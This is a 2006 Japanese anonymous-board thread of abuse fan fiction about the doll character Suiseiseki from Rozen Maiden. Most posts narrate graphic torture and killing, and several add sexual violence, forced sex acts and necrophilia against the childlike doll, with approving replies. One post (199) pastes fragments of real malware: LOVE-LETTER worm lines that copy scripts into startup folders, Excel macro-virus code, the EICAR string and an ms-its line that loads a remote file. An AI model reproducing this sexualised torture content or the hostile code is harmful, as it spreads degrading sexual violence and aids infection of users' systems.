翠星石だ。クソ人形め!俺のストレスメーターは98に達した。
と、2階の俺の部屋と思われる位置からガシャン!と音がした。
「今度は何をした?何をしたんだよお!」
急いで部屋に駆け戻った。ドアを開けるとそこには、人形がなぜか増えていた。そして・・・

179 :名無しちゃん…電波届いた?:2006/07/22(土) 01:07:03
「あー!俺の1/700大和のマストが!○○○のポスターが!」
「あーそれ雛が描いたのー、えへへ上手いでしょ。」
「ふざけるな!翠星石!こいつらを追い出せ!」
「そんなことでいちいち騒ぐなですぅ。陰気な趣味脱するチャンスですぅ」
俺はもう一体の人形を見いやった。
「どうも、翠星石がお世話になっています。妹の蒼星石です」
こんな時に自己紹介か?あ?空気読めよ馬鹿妹!
「はいはいわかったから今日は二人とも帰ってくれ」
俺は強引に二人を帰らせると、物置から釘バットを取ってきて部屋に戻った。
俺のストレスメーターはすでに爆発している。
「まったく、こんなことでいちいち騒ぐんじゃ・・・っきゃあ!」
翠星石の腹に思いっきりパンチを食らわせてやった。
そしてぐったりする翠星石を釘バットで猛打しまくる。
「きゃ!痛いですぅ!やめやがれですぅ!」
「ふざけんな!ヨーグルトの分がまだ残ってるんだぜ!」
「ヨーグルト飲んだくらいでごちゃごちゃ五月蝿いですぅ!」
この期に及んでまだ自分の罪を認めないのか!
俺は服を引き裂いて下着だけにしてやった。
「ひい!この変態!」
「人形ごときの裸見たって嬉しくもなんともねえよ!」
おら!直に痛みを味わえ!
どのくらい殴っただろうか。100回近く殴った気がする。
「う、っひぐ・・・どうしてそんなに殴るですかぁ・・・」
翠星石は涙をぼろぼろ流しながら問うのだった。
だがまだ怒りはおさまらない。破壊された模型と破られたポスターの分の恨みが残っている。

180 :名無しちゃん…電波届いた?:2006/07/22(土) 01:08:21
「まだ終わってねえ」
翠星石の下着を剥いで、尻を露出させた。
「いや、そんなところ見るなですぅ!」
「うっせえ!そして尻の穴らしき部分にバットを突っ込んでぐりぐりとほじくってやった。」
「ああ!痛い!痛いですぅ!やめてですぅ!あ・・・ああぁん 」
少し感じたのか喘ぎが漏れた。
「この野郎!妙に感じやがって!」
腹が立ったのでバットを抜くと、もう一度殴打しまくった。
「そしてこれが○○○ちゃんポスターの分だ!」
翠星石の尻の穴に手榴弾を詰め込んだ。ピンには糸をつけ、穴の外からでも抜けるように細工してある。
「へへ、こいつが何かわかるか?俺がこの糸を引けば、お前は木っ端微塵になるんだよ。謝るなら今のうちだ」
すると翠星石は泣きながら
「御免なさい!もうしないですぅ!でも私は大好きなお前の陰気な部分を取り除きたいからやったんですぅ」
最後の言葉が感に触る!死ね!
俺は糸を引いた。その瞬間、物凄い爆発が起こった。
煙が晴れた後、そこには塵と化した翠星石の無残な姿があった。



181 :名無しになりきれ:2006/07/22(土) 12:07:36
    l|i
   (l|i\ l|
   .lニl  i|ヽ         (`\   グッグッ
  .l|i_|__|>   ヽl|        .lニl  i|ヽ
   (__),   ー     ..l|i_|__|>   ヽl|      (`\   ググッ
   (_____)`ー       (__),   ー     .lニl  i|ヽ
   (__)    -     (_____)`ー       .l|i_|__|>   ヽl|
   (___)  __,.--      (__)    -    (__),   ー
    | | l|i ̄         (___)  __,.--    (_____)`ー
    | | ;           | |   ̄       (__)    -   
  く.゚・li|;|;i ;ヽ> ・         ‘ | |:・ヽ>        (___)  __,.-- 
  ・:‘;゚;|i・イハ))       .;',|l.゚|;|;i/。;       ‘; | | l|i ̄
   |l |リ ゚ 3゚)  ?    ・:|l‘; |i・3 ) !?   ・:|l| |;・:):・..
  ノl_|(l_介」).|        ノl_|(l_介」).|        ノl;',;介」).|        ;・;',二ヽ>:・
.  ≦ノ`ヽノヘ≧        ≦ノ`ヽノヘ≧     ‘ .゚;・。;・.|;i/≧;・:     ;・;',.・ハ))」).|
  ミく二二二〉ミ        ミく二二二〉ミ     ミく二:・。;二〉ミ 。;・    ミ・:‘々゚)・。;二〉 で・・・ですぅ

182 :名無しちゃん…電波届いた?:2006/07/22(土) 12:08:34
              デブゥ…!!          ですです五月蝿いんだよ!!!
おらあああ!!      \从从///    ∧_∧ ジャンクのクセに散々調子に乗りやがって!!
 ―=≡三 ∧_∧     く/',二二ヽ>    (´∀` ) 三≡=―
―=≡三と( ´∀`)つ''"´"|l |ノノ;*;''"´"''::;:,(    つ 三≡=―
 ―=≡三 ヽ     ̄ ̄⌒)>ε(;;;((⌒ ̄ ̄ ̄_  ) 三≡=―
 ―=≡三 /  / ̄ ̄´"'''⊂;;;#':*,'´''::;;;;::'''"´ ̄ヽ \ 三≡=―
 ―=≡三 \__); ///(_ ,、 `^)^) \\\  (__) 三≡=―

    ぎゃはははは!!!「デブゥ…」だってよ!!!
              (⌒∧_∧          ,//∧_∧  ひゃははは!!おもしれぇなあ!!
           バキィ!ヽ( ´∀`)  :(⌒ミ(  //(´∀` )
            バキィ!!ヽ  l| |l(:;;:( ドガァ!!///ヽ、  _`ヽゴスッ!!
           ('⌒;ヾ / '/ li| l!グシャァ!!\从从///'ミ_/ヽドゴッ!!
           (⌒)y'⌒;ヾ从从(⌒〜∵;)|l |ノノイハ)),;(´(´⌒;"'ボキボキボキッ
           (´⌒ー-   ;:#二ヽ>::;つ彡(:::)`Д´(;;;)、⌒从;;ノ・`⌒);
         (´;⌒(´⌒;;' ~ヽと;;;; #;;、ミ,,:,,;;;ヽ/ノ:#`""^ヾ⌒));
 ̄ ̄(´⌒;,( ,(゙゙゙'゛""゙゙)゙'';"(´⌒;,(´,(´⌒;)デスゥゥゥゥゥッ!!!
            ⊂;:;∴::・;:;:;:;∴::;;,::⊃

 ソ…ソウセイセキ……  ∧_∧ 死んじゃえよお前    ∧_∧止めとけよ
   ,;;rノノイハ)),... ペッ(∀`  )              (´∀` )ツバがもったいねえよ(藁
  :;ノ(:メ,゚;々。:・; ζ。´(    )              (    )

183 :名無しちゃん…電波届いた?:2006/07/22(土) 12:09:09
          ._________
         /⊂且∩ /|~ ̄|| ̄~lヽ\.          ___
  __q__。_∠_ (`x´ )/__|_____||____.|__i,__`,.____    く/',二二ヽ>
  8b==〈===d8{=., -.---|-----~|----~|_---━-}    |l |ノノイハ)) ですぅー!
 .⊂:ニ口ニニニフ_.l O |_|____.|___,i´O`l____.j⊃∽∽|l |リ:;);0゚:)l|つ__ (´⌒;;;≡≡
   ヽゝ_ノ ̄ ̄ヽゝ__ノ  ヽゝ_フ ̄ .ヽゝ__ノ(´⌒;;;≡≡ ⊂ヽ、___⊃⊃(´⌒;;;≡≡




          ._________
         /⊂且∩  /|~ ̄|| ̄~lヽ\.         ___
  __q__。_∠_ (`x´ ) /__|_____||____.|__i,__`,.____   く/',二二ヽ>
  8b==〈===d8{=., -.---|-----~|----~|_---━-}    |l |ノノイハ))
 .⊂:ニ口ニニニフ_.l O |_|____.|___,i´O`l____.j⊃∽∽|l |リ:;);-゚:)l|_    ;;;``;:;   ;::⊃:
   ヽゝ_ノ ̄ ̄ヽゝ__ノ  ヽゝ_フ ̄ .ヽゝ__ノ(´⌒;;;≡≡  ‘``;:(  (´⌒;;;≡´⌒;;;@ヽ、_;@;;,,つ::;:"”




          ._________
         /⊂且∩  /|~ ̄|| ̄~lヽ\.         ___ 
  __q__。_∠_ (`x´ ) /__|_____||____.|__i,__`,.____   く/',二二ヽ>
  8b==〈===d8{=., -.---|-----~|----~|_---━-}    |l |ノノイハ))
 .⊂:ニ口ニニニフ_.l O |_|____.|___,i´O`l____.j⊃∽∽|l |(:;;)々゛;)   ;   ;:  ::;:
   ヽゝ_ノ ̄ ̄ヽゝ__ノ  ヽゝ_フ ̄ .ヽゝ__ノ(´⌒;;;≡≡  ‘``;::;:"”  "":;:;  "  ;; ;   :

184 :名無しちゃん…電波届いた?:2006/07/22(土) 12:10:49
桜田家の納戸にうずくまる翠星石

「ううう...おなか...すいたですぅ。もう何日も食べてないですぅ。
 外に出たくても両足を砕かれて立てないからドアまで手がとどかないのですぅ」

(納戸のドアが開く)
「!あ、開いたですぅ!外に出るですぅ!」
そう言ってドアのところまで、はいずって行く翠星石。その翠星石を踏みつけて入ってくるジュン。
「ぐえっ!」
「...ん?今なんか踏んだような?」
「う...ひ、ひどいですぅ」
「空耳かな?翠星石、なんか聞いたかい?」
「いえ...何も...聞こえなかった...です」
「?!い、今の声は?翠星石は返事なんてしてないですよ?誰がジュンに返事をしたです?」
疑問に思った翠星石は空腹でかすんだ目でジュンを見上げる。
ジュンは左腕に抱き上げたドールに親しげに話しかけていた。
「そ、そいつは?!ジュ、ジュン!そいつは翠星石じゃないのです、目を覚ませですよ!!」
「今なんか聞こえたかい?薔薇水...せいせき?」
「いいえ...何も聞こえません...です...お父さ...まスター」

「な?なぜコンチクショウがジュンと?!みんな、どうしてコンチクショウを家に入れたですか?」
「ん?何だ?なんか緑色のボロ雑巾が喚いているような?」
「お父さ...マスター...これは後で薔薇水..せいせきが片付けておきます」
「ん?そうか、いや〜最近翠星石がすっかり素直で良い子になったって姉ちゃんや真紅たちにも評判なんだよ」
「嬉しい...です...ぅ」

185 :名無しちゃん…電波届いた?:2006/07/22(土) 12:11:51
「待つですぅ!な、な〜にを言ってやがるですかチビ人間!若いのに近眼が老眼に進展したですか!
 そいつは翠星石じゃないですぅ!薔薇水晶のコンチクショウですぅ!」
「あ?お前みたいな口の悪い薄汚い緑の雑巾がローゼンメイデンのわけないだろ?
 ホンモノはこの薔薇す...い星石だ。な?そうだろ」
「はい...なの...です」
「そ、そんな、です!」
「ふん、お前はコレでも食ってろ」
とジュンはそれまでクチャクチャ噛んでいたチューインガムをペッと翠星石の目の前に吐き出した。
「あ...」
翠星石の目の前の床にはガムが湯気をたてて貼りついていた。
あまりに空腹だった翠星石は吐き捨てたガムをニューっと、つまんで口に入れた。
「ふん、汚ねぇ奴だ。いこう薔薇...水せい石、姉ちゃんがオヤツだってさ」
「はい...です...参りましょう..おと...マスター...です」
(納戸のドアを閉め出て行くジュン)
納戸の中に残された翠星石
「もったいないですぅ(クチャクチャ)まだ甘みが残っているのですぅ(ジュルル)
 ジュンの唾液入りのガムです...おいしいのですぅ」

数日後
「ジュンの使用済みティッシュですぅ。これで貴重なタンパク源をゲットですぅ(クチャクチャ)
イカ臭くて、おいしいのですぅ」

堕ちるとこまで堕ちた翠星石だった。

186 :名無しちゃん…電波届いた?:2006/07/22(土) 23:22:12
翠星石虐待画像
http://www.imgup.org/iup236316.jpg

187 :名無しちゃん…電波届いた?:2006/07/25(火) 16:44:56
   ヽl   ,、 l/                                  ,,:::=======:::,,__
  〃")' ~´ヘヘ)"ヽ       \ 。○_/            ....;;;;;;゙゙゙゙゙゙゙゙゙.‐''゙ . `  ´ ´、 ゝ' ヾ゙゙゙゙゙゙゙;;;;;;;........
  !( ソノ八)ヽ) ソ        ○。  ○。。        ;;;;゙゙゙゙゙    ..‐´     く',.・二二ヽ>    `ヽ   ‐.;;;;;;
    ヾl.#゚ ヮ゚ノ!.    )) 卩__ /   。  \  ―_   ..゙゙゙;;;;;;;;...../       #%∴;.:;'ノイハ))∵    .:;;;;;゙゙゙゙      
o=====U===∩====[]コ[i(●==冫。 。 ○― ――― _     ;゙゙゙゙゙゙゙゙゙゙゙;;;;;;;;;;;;;;;;((;・;(* 々゚'#%・:゙゙゙゙゙゙゙゙゙゙゙゙ヽ.\ 
    ./ソ、j、iヾ.   ))  |ノ ̄ ̄○   。  。   ―――――――――――――☆>>クソミドリ      ´、ゝヽ 
    .~(ノ!_j~´          /。 。 ○。 二 二        i|             i|
                  。  ○ 。ノ\

188 :名無しちゃん…電波届いた?:2006/07/28(金) 03:06:06
或る日曜日の早朝、庭先の木陰で怪しい影が蠢いていた。ブリッ!ブリブリ!ブバッ!ベチャ〜「お腹が痛いですぅ…下痢ですぅ」それは翠星石だった。水をやる為に庭先へ来たところ、急に便意を催し、脱糞していたのだった。

189 :名無しちゃん…電波届いた?:2006/07/28(金) 03:14:39
…そこへジュンがやって来た。「何やってんだ?お前。」「こ、来ないでです!」ジュンが見るとそこには大量の野グソがしてあった。「お前こんなトコで糞すんなよ!トイレ行けよ!!」「間に合わなかったですぅ…それに翠星石のウンチは草花さん達の栄養になるですぅ。」

190 :名無しちゃん…電波届いた?:2006/07/28(金) 03:21:01
「ふざけんな!!」バコーン!「痛いです!やめてですぅ!」バキッ!ドカッ!ベシッ!ズシャ〜!殴る蹴ること15分。ほどよくボロボロになった糞翠。「うぅ…痛いですぅ、ひどいですよ…」

191 :名無しちゃん…電波届いた?:2006/07/28(金) 03:29:45
ジュンは翠星石の髪を乱暴に掴むと、顔面を汚物の中へ叩きつけ更に後頭部をスニーカーで踏みにじった。「くさいです!汚いですぅ!」糞まみれでほざく翠星石。

192 :名無しちゃん…電波届いた?:2006/07/28(金) 08:16:31
>>191
続きが気になる

193 :名無しちゃん…電波届いた?:2006/07/29(土) 00:21:26
>>191の続き
ジュンは翠星石を蹴っ飛ばして仰向けにすると腹を踏み付けた。
ドゴッ!ドス!ドス!ドゴッ!「うぅ…痛い!痛い!痛いですぅ!やめてですぅ…あっ!」
ブリュッ!ブバベチャ〜!その時、激しく腹を蹴られた衝撃で再び脱糞してしまった。
スカートパニエの中は下痢便で溢れている。
「…てめぇ。本当にぶち殺されてぇのかコラ。よぉ、クソモラシ」

194 :名無しちゃん…電波届いた?:2006/07/29(土) 00:32:20
ジュンはもはやジュンではなかった。異常な様子の少年に対し
翠星石は恐怖を感じで言い訳を言った。
「ジュンがお腹を蹴るからです!やめてって言ってるのにどうして暴力ばっか振るうです!?
痛くて嫌ですぅ!!」「言いたい事はそれだけか蛆野郎。」
そう言うとジュンは近くにあった大きな鉄製のシャベルを
両手に持ち、糞翠の頭を殴打し始めた。ガン!ガン!ガン!ガン!…
「ひぐっ!嫌ですぅ…やめてです!痛いですよぅ!」

195 :名無しちゃん…電波届いた?:2006/07/29(土) 00:50:14
グシャーッ!遂に顔と頭が砕けた。眼球が飛び出し、ビスク素体の破片が散らばる。
その直後、翠星石は微動だにする事なく動かなくなった。
その後ジュンは足下の土を掘り始め、数分後深さ80cm程の穴に
クソミドリを放り込んだ。上から土をかぶせて埋め立てる。
「はぁ〜やっと終わったぞ。しかし臭いな…」独語するとジュンは渇いた
喉を潤すため、何事もなかったかの様にその場を後にして家に入った。
或る真夏の日曜日の朝の出来事だった……おしまい♪

196 :名無しちゃん…電波届いた?:2006/07/29(土) 12:49:53
>>195
GJッス!

197 :名無しちゃん…電波届いた?:2006/08/01(火) 13:53:18
或る朝、いつもの様に鞄を開ける翠星石。
しかし、何故かそこには見慣れたヒキコモリ少年の部屋ではなく、
オイル臭い工場の様な景色が広がっていた。「何です?どこですか、ここは?」
「おはよう翠星石。」声がしたので振り向くと、作業服を着て軍手を嵌めた若い男が立っていた。
「誰ですぅ?」「俺はエリック。この工場で働いてる。今日は君をスクラップにするから。」
「はぁ?」突然の事で訳も分からずキョトンとする翠星石。


198 :名無しちゃん…電波届いた?:2006/08/01(火) 14:05:50
「実は、君の持ち主から君を廃棄処分する様に依頼されたんでね。今朝早く業者が
鞄に入った君ごと回収してここに持って来たんだよ。」
「ジ、ジュンが私を捨てたって言うですか?どうして…」「さあね、とにかく今から君をスクラップにするからね。」
「嫌ですぅ!逃げるですぅ!」そう言うと翠星石は鞄ごと飛んで逃げようとした。
しかし素早くエリックがロングヘアーを掴んで鞄から引きずり出した。
「痛いです!離しやがれですぅ!」バキッ!「ふぐっ!」顔面を殴りつける。「逃げられると思ってんのかバカめ!」
ドスッ!今度は腹を殴る。「痛いですぅ!何しやがるです!」

199 :厨房除け:2006/08/01(火) 14:15:59
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

200 :名無しちゃん…電波届いた?:2006/08/01(火) 14:21:44
エリックは翠星石の首を右手で掴むと力任せに締め上げた。
「く、苦しいですぅ…息が出来ないですぅ…!!」先程とは打って変わってエリックは表情も口調も豹変していた。
「このクソミドリ。今日は生意気で憎たらしい貴様を地獄に堕としてやるからな。覚悟しろよ。」
そう言うとエリックは翠星石を傾斜角45°のスチール製の台の上に、金属の枷で固定した。
両手首、両足首をがっちり固定された翠星石は、完全に身体の自由を奪われたのだった。
「何するです!動けねーですぅ!」ほざくクソミドリをよそにエリックは淡々と準備を始める。
工業用の特殊なカッターを持ったエリックは、ためらう事なく翠星石お気に入りのドレスを縦に切り裂いた。
音も無く冷たい刃は、滑らかに緑のドレスを裁断し、翠星石の乙女としての恥部を白日の下に晒す事となった。

201 :名無しちゃん…電波届いた?:2006/08/01(火) 17:21:37
>>200
続きはありますか?

202 :名無しちゃん…電波届いた?:2006/08/01(火) 17:51:16
>>200の続き
「嫌ぁぁぁ〜!!やめるです!お前は変態ですぅ!!翠星石の大切なドレスがぁ〜!」
喚くクソミドリに構わずエリックはドレスの残った部分とペチコート・スカートパニエを剥ぎ取った。
翠星石は頭上のヘッドドレスを除き一糸纏わぬ全裸となったのである。
「うう…恥ずかしいですぅ。どうして私ばっかこんな目に…」今にも泣き出しそうな顔をする翠星石。
次の瞬間、反射的にビクッと体を動かした。エリックが翠星石の局部を手で撫でたのである。
「や、やめろですぅ!この変態野郎!!」「お前を造った人形師はかなりの変態だなぁ。こんなに精巧で緻密にココが再現されているとは…」
「お父様を悪く言うなです!お前みたいなキチガイ変態野郎と一緒にすんなですぅ!!」

203 :名無しちゃん…電波届いた?:2006/08/02(水) 00:14:17
「これ以上この誇り高き薔薇乙女第3ドール・翠星石を汚す事は許さんですよ!!」
元来負けん気の強い翠星石の毒舌が冴えわたる。
「とっとと解放して翠星石に謝罪しやがれですぅ!許さんですよ変態!」
バキッ!エリックの左ストレートが糞翠の顔を直撃!「ふぐぅ!」こうるさいクソミドリを黙らせる事に成功した。
その後エリックは透明な液体入りのビンを持って来た。そしてゆっくりと蓋を開け
翠星石の両膝の関節部にその液体をかけた。ジュワ〜ッ!モクモクと白煙が上がり、翠星石の悲鳴が場内に響き渡る。
「キャアアアア〜〜!!!」甲高くて耳障りな声だ。「す、翠星石の足がぁ〜!!熱い…痛いですぅ!!」
「フフフ…どうだ、濃度25%の塩酸を浴びた感想は?次はここだ!!」

204 :名無しちゃん…電波届いた?:2006/08/02(水) 00:30:22
バシャ〜ッ!エリックは残りの濃塩酸を翠星石の「おまんまん」にぶちまけた。
「ヒギャアアアアアア――!!!」凄まじい絶叫と共に失神するクソミドリ。陰部からは大量の煙りが上がっている。
エリックは翠星石が気絶してる間に大鉈で両膝を切断した。先程塩酸をかけられていた為表面に腐食が起り
切断を容易にした。ドコン!「げふぅ!」鉄パイプで腹を殴打する。今の衝撃で目を覚ますクソミドリ。
「うう……」「寝てんじゃねぇ!糞ミドリ虫が!!」怒鳴るエリック。
「足がぁ…両足が無いですぅ!おまんまんも痛いですし…うぅ…うっうっ」
翠星石は泣き出した。とめどなく涙が溢れる。

205 :名無しちゃん…電波届いた?:2006/08/02(水) 00:43:50
「うぅ…うっうっえぐっ…グスン翠星石はジャンクになってしまったですぅ…」
「馬鹿か貴様?元からジャンクだろうが屑が!」そう言うとエリックはまたもや謎の液体入りのビンを持って来た。
「飲めよ」「そんなもの飲める訳ねぇです!!」「安心しろ、これは塩酸じゃない」
エリックは翠星石の口に指を突っ込んで無理やりこの液体を飲ませた。
「うぅ!ゴボッ、ゲボッ!や、やめろです!く、苦しいでふぅ」吐き出さない様に鼻と口をしっかりと塞ぐ。
コップ一杯分の液体を飲まされたクソミドリ。その直後嘔吐した。「ゲボァ―ッ!ゲ―ッゲロゲロ」
「ハハハ美味いだろう?廃油の味は?汚れた工業用オイルだぜ」「ゲホッ!ゲホッゲフッ!」
本当に苦しそうな翠星石。顔は涙と吐瀉物で汚れている。

206 :名無しちゃん…電波届いた?:2006/08/02(水) 01:00:14
「苦しいですぅ…もうやめて下さいですぅ…」すっかり弱りきった様子だ。
エリックは再び鉄パイプを持つと翠星石を殴り始めた。ガン!ガン!ガン!ドスッ!「ぐふぅ!」
「人形の分際で人間と同じ物食いやがってよ、食い意地の張った豚野郎め!
そのくせ人間を馬鹿にする様な態度と喋り方しやがって、何様だよテメェ!!」
鉄パイプを振るう腕に力がみなぎる。エリックの怒りと憎しみは頂点に達しつつあった。
数分後、全身を乱打された翠星石はぐったりしていた。エリックは金属の枷を外すと、糞翠を床に叩きつけた。
ドシャーン!身をかがめてロングヘアーを掴むと、そのまま引きずって、ベルトコンベアーの上に乗せた。
スイッチを入れると、ギューンゴゴゴ…という轟音と共にベルトコンベアーが動き出した。

207 :名無しちゃん…電波届いた?:2006/08/03(木) 01:10:42
ベルトコンベアーの先には巨大なローラーが待ち構えていた。
両足を失い、局部を塩酸で焼かれ、廃油を飲まされた上に全身を激しく乱打された翠星石は
ボロボロになりながらもかろうじて動く両腕だけでそこから逃れようとした。
「ハァハァ…そ、蒼星石…ジュン…うぅ…」呻きながら這いつくばる。しかし運命は残酷だった。
グシャーッ!バリバリバリバリン!!!ローラーは容赦なく翠星石の体を押し潰した。バラバラに砕かれたビスク素体の破片は
切り裂かれた下着やドレス、靴、そして人工精霊スイドリーム入りの鞄ごと焼却炉に投げ込まれた。ここに翠星石ことクソミドリの廃棄処分が完了したのである。 おしまい♪

208 :名無しちゃん…電波届いた?:2006/08/03(木) 01:15:16
>>202-207
素晴らしい!


209 :名無しちゃん…電波届いた?:2006/08/07(月) 04:17:22
翠星石のうんこは緑色。だからクソミドリ。
翠星石のドレスは緑色。だからクソミドリ。
翠星石の左目は緑色。だからクソミドリ。


210 :名無しちゃん…電波届いた?:2006/08/07(月) 04:27:52
ですぅですぅ五月蠅いミドリ虫がいたので、殺虫剤を大量噴射しといた。
そしたら「ぶへっ、や、やめろですぅ!何しやがるです!」とか言うから益々ムカついて
ガソリンかけて火をつけたら、すごい勢いで燃えあがってギャーギャー喚きながら
クソミドリ虫が地面の上をのたうちまわってた。面白かった。

211 :名無しちゃん…電波届いた?:2006/08/07(月) 19:34:47
翠星石って可愛いよね…。一日中翠星石の事考えてる。本当に萌え〜。
…とか言ってる翠厨の諸兄達の首を刎ね、翠星石にプレゼント。
生首に囲まれた翠星石は「嫌ぁぁぁぁっ〜!!!気持ち悪いですぅ!!
嫌ですぅ!!うわあああん!!」などと泣き喚く。ほんとにうるせぇクソミドリだな。

212 :名無しちゃん…電波届いた?:2006/08/07(月) 20:50:16
虐待レスって内容に広がりもなくてワンパターンだし
オタクなうえに漫画のキャラを虐待って
色んな面で終わってるよね

213 :名無しちゃん…電波届いた?:2006/08/07(月) 21:01:51
君達よりはマシだろ、翠厨w

214 :名無しちゃん…電波届いた?:2006/08/08(火) 06:15:46
翠星石ですぅ!ですなのですぅ!だから翠星石ですぅ!ですぅですぅですぅですぅですぅ
ですぅですぅですぅですぅですぅですぅですぅですぅですぅですぅですぅ
ですからぁ〜翠星石ですぅ!ですなのですぅ!そうです!翠星石ですぅ!
翠星石DEATH!!!

215 :名無しちゃん…電波届いた?:2006/08/08(火) 08:54:45
親愛なる翠星石ちゃんへ♪
今日もた〜っぷり可愛いがってあげるね♪
身体中の球体関節を破砕して、お気に入りのドレスをズタズタに引き裂いて
両手足を根元から切断して、おまんまんを肉裂きにして、綺麗なオッドアイを砕き割って
全身にラードを塗りたくって、こんがり焼き殺してあげるね!
君の得意なスコーン焼きの要領で、可愛い君を焼殺してあげるね♪

216 :名無しちゃん…電波届いた?:2006/08/08(火) 15:25:07
     ∩___∩   \ヽ
     | ノ     ヽ   \ \ヽ
     /#●   ● |    ヽ ヽ \
    |    ( _●_)  ミ    i l  ヽ ぐちゃ
   彡、   |∪|   ノ    i l  l i
   / _  ヽノ   )    l i  | l
  (___)     / /    ,,-----、
          / /    |;::::  ::::|
       ⊂二(⌒ )二二二|;::::  ::::|⊃ /’, ’, ¨
           ̄ ’,ヽ∴。|;::::’,ヾ,::::| /。・,/∴
             く/',二|!|!!,i,,!ii,!l,二ヽ>
                |l |ノノ;;∴#,,;∞イハ))
                |l |(* 々゚ノ|
                   ノl⊂l_介」つ ←クソミドリ 
                ≦ノ`ヽノヘ≧
.               ミく二二二〉ミ

217 :名無しちゃん…電波届いた?:2006/08/09(水) 18:29:24
くんくん…翠星石っていい匂いがする。柔らかい胸にドレスの上から顔をうずめてみた。
「や、やめやがれですぅ…」頬を赤らめながら恥かしがる。
あぁ…翠星石…可愛いよ…ハムッ、ガブッ!萌え過ぎて興奮した俺は彼女の胸をおもいっきり噛んだ。
「!!いたぁ〜〜!痛いです!痛い!痛い!痛いですぅ!」涙目で暴れる翠星石。
ハァハァハァハァ…俺は理性を失いところ構わず翠星石の身体中を噛んだり舐めたりしゃぶったりした。
「嫌ですぅ〜!やめてですぅ!気持ち悪いですぅ!!」…この時、俺の 「怒りん棒」はビンビンだった。
素早く翠星石のスカートに手を入れ、下着を脱がす。
露わになった花園を見て、俺の興奮はMAXに達した。

218 :名無しちゃん…電波届いた?:2006/08/09(水) 18:56:49
ふ〜、ふ〜っ!翠のおまんまんに息を吹きかけてみる。
「いやぁ〜っ!やめろですぅ!く…恥ずかしいですぅ!」
次に俺は翠星石にフェラしてもらいたい衝動にかられ、肉棒を翠の顔に近付けた。
「しゃぶれよ」「そんな汚いものしゃぶれるもんじゃねーですぅ!」しかし俺は翠星石の口に無理やりペニスを突っ込んだ。
「んぐっ!んん…!」「噛むなよ!歯立てんじゃねぇぞ!」「んぐんぐ…チュプ…」ドピュー!「あ!もう出ちまった!」
翠星石の口の中は濃厚な精液まみれだった。生暖かくて苦いですぅ…」
次に俺は尿意を催した。再び翠の口にペニスを突っ込んだ。「飲め。」「!!!?」ドクドク…
「ゲボッ〜ァ!!」翠星石は泣きながら小便を口から吐いた。

219 :名無しちゃん…電波届いた?:2006/08/10(木) 06:26:25
「おえっ!げぇ〜!き、気持ち悪いですぅ…!くさいです!なんて事しやがるです!」
「これは愛だろ?」「何言ってやがるです!?これのどこが愛ですか!!」
「愛してるよ!翠星石!!」そう叫ぶと半ば狂人と化した俺は、隠し持っていたサバイバルナイフを取りだし
翠星石の右肩に突き刺した。グサッ!「ひぐぅ!!痛いですぅ!!」
「ハァハァハァハァ!翠星石ぃ〜〜!!」グサッグサッグサッグサッグサッ!!
翠星石は胸と腹をめった刺しにされてしまった。身体を小刻みに痙攣させながら口から涎を垂らして絶命した。
その後俺は無抵抗且つ無言のこの人形と屍姦するのだった……。

220 :名無しちゃん…電波届いた?:2006/08/13(日) 14:43:49
「ねぇ翠星石たん、つまんないから遊ぼ♪」「はぁ?何言ってやがるですか。この暑い時に…
寝言は寝てから言いやがれですぅ!」「いやだ!遊ぶぅ!」そう言うと坊やは翠星石を高く持ち上げ
床に叩きつけた。ドシャーン!!「うぐっ!痛いですぅ!」「そ〜れ、高い高い〜」ドシャーン!高い高いドシャーン…
これを朝から夕方まで繰り返す。黄昏時、紅い落日に染まる部屋は血の流れない翠星石の
為にあるようだった。8時間近くも床に叩きつけられ続けた翠星石は、虚ろな目でぐったりしていた。
「うぅ……はぁはぁ…い、痛いです…痛いですぅ…」両目から涙が流れている…この不条理極まりない
虐待地獄を呪いながら、翠星石は今日も泣き続けるのだった……

221 :名無しちゃん…電波届いた?:2006/08/13(日) 17:50:38
>>220GJです!

222 :名無しちゃん…電波届いた?:2006/08/19(土) 11:08:02
あれほど言ったのに、まだこんなスレ立てるですか!もう許さんですぅ!
お前を許すわけにはいかんですぅ!こんなスレでレスたくさん付くとでも
思ってるなんて頭おかしーだろですぅ!お前みたいなおばか初めて見たですぅ!
お前みたいなおバカ、雛苺以下ですぅ!お前みたいなおばか、水銀燈以下ですぅ!
死んでほしーですぅ!つーか、死ぬべきですぅ!お前は絶対に許されないですぅ!
勘違いしたおばかを許すわけにはいかんのですなの!面白半分にいい加減なスレ立て
する人間など許さんですぅ!キャラメルコーンのピーナッツを耳の穴に詰めて死ねですぅ!!!
今までお前がどんな生き方してきたか知らねーですけど、どーせひどい生き様だったと想像出来るですぅ!
お前のスレから読みとれるですぅ!ジャンク特有の匂いがするですぅ!
お前のことが全く理解出来んですぅ!お前は絶対許さんですぅ!
死んでも許さんです!地獄で苦しめ苦しめ〜ですぅ!それでも足らんくらいですぅ!
豆腐の角に頭ぶつけて死ねですぅ!!!
